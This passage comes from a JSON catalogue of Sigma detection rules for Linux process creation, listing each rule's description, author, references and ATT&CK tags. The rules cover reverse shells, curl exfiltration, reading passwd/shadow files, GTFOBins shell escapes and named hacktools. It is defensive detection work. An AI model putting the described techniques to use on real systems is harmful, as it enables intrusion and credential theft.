"level": "high", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://twitter.com/Joseliyo_Jstnk/status/1620131033474822144", "https://blogs.blackberry.com/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_cp_passwd_or_shadow_tmp.yml" ], "tags": [ "attack.credential-access", "attack.t1552.001" ] }, "related": [ { "dest-uuid": "837f9164-50af-4ac0-8219-379d8a74cefc", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "fa4aaed5-4fe0-498d-bbc0-08e3346387ba", "value": "Copy Passwd Or Shadow From TMP Path" }, { "description": "Detects execution of the \"groupdel\" binary. Which is used to delete a group. This is sometimes abused by threat actors in order to cover their tracks", "meta": { "author": "Tuan Le (NCSGroup)", "creation_date": "2022-12-26", "falsepositive": [ "Legitimate administrator activities" ], "filename": "proc_creation_lnx_groupdel.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://www.cybrary.it/blog/0p3n/linux-commands-used-attackers/", "https://www.cyberciti.biz/faq/linux-remove-user-command/", "https://linuxize.com/post/how-to-delete-group-in-linux/", "https://linux.die.net/man/8/groupdel", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_groupdel.yml" ], "tags": [ "attack.impact", "attack.t1531" ] }, "related": [ { "dest-uuid": "b24e2a20-3b3d-4bf0-823b-1ed765398fb0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "8a46f16c-8c4c-82d1-b121-0fdd3ba70a84", "value": "Group Has Been Deleted Via Groupdel" }, { "description": "Detects the usage of utilities such as 'systemctl', 'service'...etc to stop or disable tools and services", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-09-15", "falsepositive": [ 
"Legitimate administration activities" ], "filename": "proc_creation_lnx_services_stop_and_disable.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://www.trendmicro.com/pl_pl/research/20/i/the-evolution-of-malicious-shell-scripts.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_services_stop_and_disable.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "de25eeb8-3655-4643-ac3a-b662d3f26b6b", "value": "Disable Or Stop Services" }, { "description": "Detects execution of the \"userdel\" binary. Which is used to delete a user account and related files. This is sometimes abused by threat actors in order to cover their tracks", "meta": { "author": "Tuan Le (NCSGroup)", "creation_date": "2022-12-26", "falsepositive": [ "Legitimate administrator activities" ], "filename": "proc_creation_lnx_userdel.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://www.cybrary.it/blog/0p3n/linux-commands-used-attackers/", "https://www.cyberciti.biz/faq/linux-remove-user-command/", "https://linuxize.com/post/how-to-delete-group-in-linux/", "https://linux.die.net/man/8/userdel", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_userdel.yml" ], "tags": [ "attack.impact", "attack.t1531" ] }, "related": [ { "dest-uuid": "b24e2a20-3b3d-4bf0-823b-1ed765398fb0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "08f26069-6f80-474b-8d1f-d971c6fedea0", "value": "User Has Been Deleted Via Userdel" }, { "description": "Detects execution of binaries located in potentially suspicious locations via \"nohup\"", "meta": { "author": "Joseliyo Sanchez, @Joseliyo_Jstnk", "creation_date": "2023-06-02", "falsepositive": [ "Unknown" ], "filename": "proc_creation_lnx_nohup_susp_execution.yml", "level": "high", 
"logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://blogs.jpcert.or.jp/en/2023/05/gobrat.html", "https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection", "https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection", "https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_nohup_susp_execution.yml" ], "tags": [ "attack.execution" ] }, "uuid": "457df417-8b9d-4912-85f3-9dbda39c3645", "value": "Suspicious Nohup Execution" }, { "description": "Detects the use of the find command to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or exploitation attempt.\n", "meta": { "author": "Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.)", "creation_date": "2024-09-02", "falsepositive": [ "Unknown" ], "filename": "proc_creation_lnx_find_shell_execution.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://www.elastic.co/guide/en/security/current/linux-restricted-shell-breakout-via-linux-binary-s.html", "https://gtfobins.github.io/gtfobins/find/#shell", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_find_shell_execution.yml" ], "tags": [ "attack.discovery", "attack.t1083" ] }, "related": [ { "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6adfbf8f-52be-4444-9bac-81b539624146", "value": "Shell Execution via Find - Linux" }, { "description": "Detects a suspicious curl process start on linux with set useragent options", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-09-15", "falsepositive": [ "Scripts 
created by developers and admins", "Administrative activity" ], "filename": "proc_creation_lnx_susp_curl_useragent.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://curl.se/docs/manpage.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_curl_useragent.yml" ], "tags": [ "attack.command-and-control", "attack.t1071.001" ] }, "related": [ { "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b86d356d-6093-443d-971c-9b07db583c68", "value": "Suspicious Curl Change User Agents - Linux" }, { "description": "Detects attempts to force stop the ufw using ufw-init", "meta": { "author": "Joseliyo Sanchez, @Joseliyo_Jstnk", "creation_date": "2023-01-18", "falsepositive": [ "Network administrators" ], "filename": "proc_creation_lnx_disable_ufw.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://twitter.com/Joseliyo_Jstnk/status/1620131033474822144", "https://blogs.blackberry.com/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_disable_ufw.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.004" ] }, "related": [ { "dest-uuid": "5372c5fe-f424-4def-bcd5-d3a8e770f07b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "84c9e83c-599a-458a-a0cb-0ecce44e807a", "value": "Ufw Force Stop Using Ufw-Init" }, { "description": "Detects execution of the \"esxcli\" command with the \"vsan\" flag in order to retrieve information about virtual storage. 
Seen used by malware such as DarkSide.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), Cedric Maurugeon", "creation_date": "2023-09-04", "falsepositive": [ "Legitimate administration activities" ], "filename": "proc_creation_lnx_esxcli_vsan_discovery.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://developer.vmware.com/docs/11743/esxi-7-0-esxcli-command-reference/namespace/esxcli_vsan.html", "https://www.trendmicro.com/en_us/research/21/e/darkside-linux-vms-targeted.html", "https://www.trendmicro.com/en_us/research/22/a/analysis-and-Impact-of-lockbit-ransomwares-first-linux-and-vmware-esxi-variant.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_esxcli_vsan_discovery.yml" ], "tags": [ "attack.discovery", "attack.t1033", "attack.t1007" ] }, "related": [ { "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "322bad5a-1c49-4d23-ab79-76d641794afa", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d54c2f06-aca9-4e2b-81c9-5317858f4b79", "value": "ESXi VSAN Information Discovery Via ESXCLI" }, { "description": "Detects known hacktool execution based on image name.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), Georg Lauenstein (sure[secure])", "creation_date": "2023-01-03", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_lnx_susp_hktl_execution.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://github.com/Pennyw0rth/NetExec/", "https://github.com/t3l3machus/hoaxshell", "https://github.com/HavocFramework/Havoc", "https://github.com/t3l3machus/Villain", "https://github.com/carlospolop/PEASS-ng", "https://github.com/pathtofile/bad-bpf", 
"https://github.com/Gui774ume/ebpfkit", "https://github.com/Ne0nd0g/merlin", "https://github.com/1N3/Sn1per", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_hktl_execution.yml" ], "tags": [ "attack.execution", "attack.resource-development", "attack.t1587" ] }, "related": [ { "dest-uuid": "edadea33-549c-4ed1-9783-8f5a5853cbdf", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a015e032-146d-4717-8944-7a1884122111", "value": "Linux HackTool Execution" }, { "description": "Detects usage of system utilities (only grep and egrep for now) to discover security software discovery", "meta": { "author": "Daniil Yugoslavskiy, oscd.community", "creation_date": "2020-10-19", "falsepositive": [ "Legitimate activities" ], "filename": "proc_creation_lnx_security_software_discovery.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518.001/T1518.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_security_software_discovery.yml" ], "tags": [ "attack.discovery", "attack.t1518.001" ] }, "related": [ { "dest-uuid": "cba37adb-d6fb-4610-b069-dd04c0643384", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c9d8b7fd-78e4-44fe-88f6-599135d46d60", "value": "Security Software Discovery - Linux" }, { "description": "Detects the use of the \"flock\" command to execute a shell. 
Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.\n", "meta": { "author": "Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.)", "creation_date": "2024-09-02", "falsepositive": [ "Unknown" ], "filename": "proc_creation_lnx_flock_shell_execution.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://www.elastic.co/guide/en/security/current/linux-restricted-shell-breakout-via-linux-binary-s.html", "https://gtfobins.github.io/gtfobins/flock/#shell", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_flock_shell_execution.yml" ], "tags": [ "attack.discovery", "attack.t1083" ] }, "related": [ { "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4b09c71e-4269-4111-9cdd-107d8867f0cc", "value": "Shell Execution via Flock - Linux" }, { "description": "Detects process discovery commands. 
Adversaries may attempt to get information about running processes on a system.\nInformation obtained could be used to gain an understanding of common software/applications running on systems within the network\n", "meta": { "author": "Ömer Günal, oscd.community", "creation_date": "2020-10-06", "falsepositive": [ "Legitimate administration activities" ], "filename": "proc_creation_lnx_process_discovery.yml", "level": "informational", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1057/T1057.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_process_discovery.yml" ], "tags": [ "attack.discovery", "attack.t1057" ] }, "related": [ { "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4e2f5868-08d4-413d-899f-dc2f1508627b", "value": "Process Discovery" }, { "description": "Detects the use of grep to discover specific files created by the GobRAT malware", "meta": { "author": "Joseliyo Sanchez, @Joseliyo_Jstnk", "creation_date": "2023-06-02", "falsepositive": [ "Unknown" ], "filename": "proc_creation_lnx_malware_gobrat_grep_payload_discovery.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://blogs.jpcert.or.jp/en/2023/05/gobrat.html", "https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection", "https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_malware_gobrat_grep_payload_discovery.yml" ], "tags": [ "attack.discovery", "attack.t1082" ] }, "related": [ { "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": 
[ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e34cfa0c-0a50-4210-9cb3-5632d08eb041", "value": "Potential GobRAT File Discovery Via Grep" }, { "description": "Detects usage of the PHP CLI with the \"-r\" flag which allows it to run inline PHP code. The rule looks for calls to the \"fsockopen\" function which allows the creation of sockets.\nAttackers often leverage this in combination with functions such as \"exec\" or \"fopen\" to initiate a reverse shell connection.\n", "meta": { "author": "@d4ns4n_", "creation_date": "2023-04-07", "falsepositive": [ "Unknown" ], "filename": "proc_creation_lnx_php_reverse_shell.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://www.revshells.com/", "https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_php_reverse_shell.yml" ], "tags": [ "attack.execution" ] }, "uuid": "c6714a24-d7d5-4283-a36b-3ffd091d5f7e", "value": "Potential PHP Reverse Shell" }, { "description": "Detects suspicious sub processes of web server processes", "meta": { "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2021-10-15", "falsepositive": [ "Web applications that invoke Linux command line tools" ], "filename": "proc_creation_lnx_webshell_detection.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF", "https://www.acunetix.com/blog/articles/web-shells-101-using-php-introduction-web-shells-part-2/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_webshell_detection.yml" ], "tags": [ "attack.persistence", "attack.t1505.003" ] }, "related": [ { "dest-uuid": 
"5d0d3609-d06d-49e1-b9c9-b544e0c618cb", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "818f7b24-0fba-4c49-a073-8b755573b9c7", "value": "Linux Webshell Indicators" }, { "description": "Detects execution of the \"esxcli\" command with the \"network\" flag in order to retrieve information about the network configuration.", "meta": { "author": "Cedric Maurugeon", "creation_date": "2023-09-04", "falsepositive": [ "Legitimate administration activities" ], "filename": "proc_creation_lnx_esxcli_network_discovery.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://developer.vmware.com/docs/11743/esxi-7-0-esxcli-command-reference/namespace/esxcli_network.html", "https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_esxcli_network_discovery.yml" ], "tags": [ "attack.discovery", "attack.t1033", "attack.t1007" ] }, "related": [ { "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "322bad5a-1c49-4d23-ab79-76d641794afa", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "33e814e0-1f00-4e43-9c34-31fb7ae2b174", "value": "ESXi Network Configuration Discovery Via ESXCLI" }, { "description": "Detects the doas tool execution in linux host platform. 
This utility tool allows standard users to perform tasks as root, the same way sudo does.", "meta": { "author": "Sittikorn S, Teoderick Contreras", "creation_date": "2022-01-20", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_lnx_doas_execution.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://www.makeuseof.com/how-to-install-and-use-doas/", "https://research.splunk.com/endpoint/linux_doas_tool_execution/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_doas_execution.yml" ], "tags": [ "attack.privilege-escalation", "attack.t1548" ] }, "related": [ { "dest-uuid": "67720091-eee3-4d2d-ae16-8264567f6f5b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "067d8238-7127-451c-a9ec-fa78045b618b", "value": "Linux Doas Tool Execution" }, { "description": "Detects listing or file reading of \".dockerenv\" which can be a sign of potential container discovery", "meta": { "author": "Seth Hanford", "creation_date": "2023-08-23", "falsepositive": [ "Legitimate system administrator usage of these commands", "Some container tools or deployments may use these techniques natively to determine how they proceed with execution, and will need to be filtered" ], "filename": "proc_creation_lnx_susp_dockerenv_recon.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://stackoverflow.com/questions/20010199/how-to-determine-if-a-process-runs-inside-lxc-docker", "https://blog.skyplabs.net/posts/container-detection/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_dockerenv_recon.yml" ], "tags": [ "attack.discovery", "attack.t1082" ] }, "related": [ { "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], 
"uuid": "11701de9-d5a5-44aa-8238-84252f131895", "value": "Docker Container Discovery Via Dockerenv Listing" }, { "description": "Detects execution of ruby with the \"-e\" flag and calls to \"socket\" related functions. This could be an indication of a potential attempt to setup a reverse shell", "meta": { "author": "@d4ns4n_", "creation_date": "2023-04-07", "falsepositive": [ "Unknown" ], "filename": "proc_creation_lnx_ruby_reverse_shell.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://www.revshells.com/", "https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_ruby_reverse_shell.yml" ], "tags": [ "attack.execution" ] }, "uuid": "b8bdac18-c06e-4016-ac30-221553e74f59", "value": "Potential Ruby Reverse Shell" }, { "description": "Detects the enumeration of other remote systems.", "meta": { "author": "Alejandro Ortuno, oscd.community", "creation_date": "2020-10-22", "falsepositive": [ "Legitimate administration activities" ], "filename": "proc_creation_lnx_remote_system_discovery.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_remote_system_discovery.yml" ], "tags": [ "attack.discovery", "attack.t1018" ] }, "related": [ { "dest-uuid": "e358d692-23c0-4a31-9eb6-ecc13a8d7735", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "11063ec2-de63-4153-935e-b1a8b9e616f1", "value": "Linux Remote System Discovery" }, { "description": "Detects the use of the \"gcc\" utility to execute a shell. 
Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.\n", "meta": { "author": "Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.)", "creation_date": "2024-09-02", "falsepositive": [ "Unknown" ], "filename": "proc_creation_lnx_gcc_shell_execution.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://gtfobins.github.io/gtfobins/gcc/#shell", "https://gtfobins.github.io/gtfobins/c89/#shell", "https://www.elastic.co/guide/en/security/current/linux-restricted-shell-breakout-via-linux-binary-s.html", "https://gtfobins.github.io/gtfobins/c99/#shell", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_gcc_shell_execution.yml" ], "tags": [ "attack.discovery", "attack.t1083" ] }, "related": [ { "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9b5de532-a757-4d70-946c-1f3e44f48b4d", "value": "Shell Execution GCC - Linux" }, { "description": "Detects potential container discovery via listing of certain kernel features in the \"/proc\" virtual filesystem", "meta": { "author": "Seth Hanford", "creation_date": "2023-08-23", "falsepositive": [ "Legitimate system administrator usage of these commands", "Some container tools or deployments may use these techniques natively to determine how they proceed with execution, and will need to be filtered" ], "filename": "proc_creation_lnx_susp_container_residence_discovery.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://stackoverflow.com/questions/20010199/how-to-determine-if-a-process-runs-inside-lxc-docker", "https://blog.skyplabs.net/posts/container-detection/", 
"https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_container_residence_discovery.yml" ], "tags": [ "attack.discovery", "attack.t1082" ] }, "related": [ { "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "746c86fb-ccda-4816-8997-01386263acc4", "value": "Container Residence Discovery Via Proc Virtual FS" }, { "description": "Detects installation of a new certificate on the system which attackers may use to avoid warnings when connecting to controlled web servers or C2s", "meta": { "author": "Ömer Günal, oscd.community", "creation_date": "2020-10-05", "falsepositive": [ "Legitimate administration activities" ], "filename": "proc_creation_lnx_install_root_certificate.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_install_root_certificate.yml" ], "tags": [ "attack.defense-evasion", "attack.t1553.004" ] }, "related": [ { "dest-uuid": "c615231b-f253-4f58-9d47-d5b4cbdb6839", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "78a80655-a51e-4669-bc6b-e9d206a462ee", "value": "Install Root Certificate" }, { "description": "Detects the use of \"vim\" and its sibling commands to execute a shell or proxy commands.\nSuch behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-12-28", "falsepositive": [ "Unknown" ], "filename": "proc_creation_lnx_vim_shell_execution.yml", "level": "high", "logsource.category": 
"process_creation", "logsource.product": "linux", "refs": [ "https://gtfobins.github.io/gtfobins/rvim/", "https://gtfobins.github.io/gtfobins/vim/", "https://gtfobins.github.io/gtfobins/vimdiff/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_vim_shell_execution.yml" ], "tags": [ "attack.discovery", "attack.t1083" ] }, "related": [ { "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7ab8f73a-fcff-428b-84aa-6a5ff7877dea", "value": "Vim GTFOBin Abuse - Linux" }, { "description": "Detects a suspicious curl process start the adds a file to a web request", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), Cedric MAURUGEON (Update)", "creation_date": "2022-09-15", "falsepositive": [ "Scripts created by developers and admins" ], "filename": "proc_creation_lnx_susp_curl_fileupload.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://curl.se/docs/manpage.html", "https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-19---curl-upload-file", "https://twitter.com/d1r4c/status/1279042657508081664", "https://medium.com/@petehouston/upload-files-with-curl-93064dcccc76", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_curl_fileupload.yml" ], "tags": [ "attack.exfiltration", "attack.t1567", "attack.t1105" ] }, "related": [ { "dest-uuid": "40597f16-0963-4249-bf4c-ac93b7fb9807", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
"type": "related-to" } ], "uuid": "00b90cc1-17ec-402c-96ad-3a8117d7a582", "value": "Suspicious Curl File Upload - Linux" }, { "description": "Detects file deletion using \"rm\", \"shred\" or \"unlink\" commands which are used often by adversaries to delete files left behind by the actions of their intrusion activity", "meta": { "author": "Ömer Günal, oscd.community", "creation_date": "2020-10-07", "falsepositive": [ "Legitimate administration activities" ], "filename": "proc_creation_lnx_file_deletion.yml", "level": "informational", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.004/T1070.004.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_file_deletion.yml" ], "tags": [ "attack.defense-evasion", "attack.t1070.004" ] }, "related": [ { "dest-uuid": "d63a3fb8-9452-4e9d-a60a-54be68d5998c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "30aed7b6-d2c1-4eaf-9382-b6bc43e50c57", "value": "File Deletion" }, { "description": "Detects enumeration of local system groups. 
Adversaries may attempt to find local system groups and permission settings", "meta": { "author": "Ömer Günal, Alejandro Ortuno, oscd.community", "creation_date": "2020-10-11", "falsepositive": [ "Legitimate administration activities" ], "filename": "proc_creation_lnx_local_groups.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.001/T1069.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_local_groups.yml" ], "tags": [ "attack.discovery", "attack.t1069.001" ] }, "related": [ { "dest-uuid": "a01bf75f-00b2-4568-a58f-565ff9bf202b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "676381a6-15ca-4d73-a9c8-6a22e970b90d", "value": "Local Groups Discovery - Linux" }, { "description": "Detects installation of suspicious packages using system installation utilities", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-01-03", "falsepositive": [ "Legitimate administration activities" ], "filename": "proc_creation_lnx_install_suspicioua_packages.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://gist.githubusercontent.com/MichaelKoczwara/12faba9c061c12b5814b711166de8c2f/raw/e2068486692897b620c25fde1ea258c8218fe3d3/history.txt", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_install_suspicioua_packages.yml" ], "tags": [ "attack.defense-evasion", "attack.t1553.004" ] }, "related": [ { "dest-uuid": "c615231b-f253-4f58-9d47-d5b4cbdb6839", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "700fb7e8-2981-401c-8430-be58e189e741", "value": "Suspicious Package Installed - Linux" }, { "description": "Detects 
execution of the perl binary with the \"-e\" flag and common strings related to potential reverse shell activity", "meta": { "author": "@d4ns4n_, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-04-07", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_lnx_perl_reverse_shell.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://www.revshells.com/", "https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_perl_reverse_shell.yml" ], "tags": [ "attack.execution" ] }, "uuid": "259df6bc-003f-4306-9f54-4ff1a08fa38e", "value": "Potential Perl Reverse Shell Execution" }, { "description": "Detects usage of nohup which could be leveraged by an attacker to keep a process running or break out from restricted environments", "meta": { "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", "creation_date": "2022-06-06", "falsepositive": [ "Administrators or installed processes that leverage nohup" ], "filename": "proc_creation_lnx_nohup.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://en.wikipedia.org/wiki/Nohup", "https://gtfobins.github.io/gtfobins/nohup/", "https://www.computerhope.com/unix/unohup.htm", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_nohup.yml" ], "tags": [ "attack.execution", "attack.t1059.004" ] }, "related": [ { "dest-uuid": "a9d4b653-6915-42af-98b2-5758c4ceee56", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], 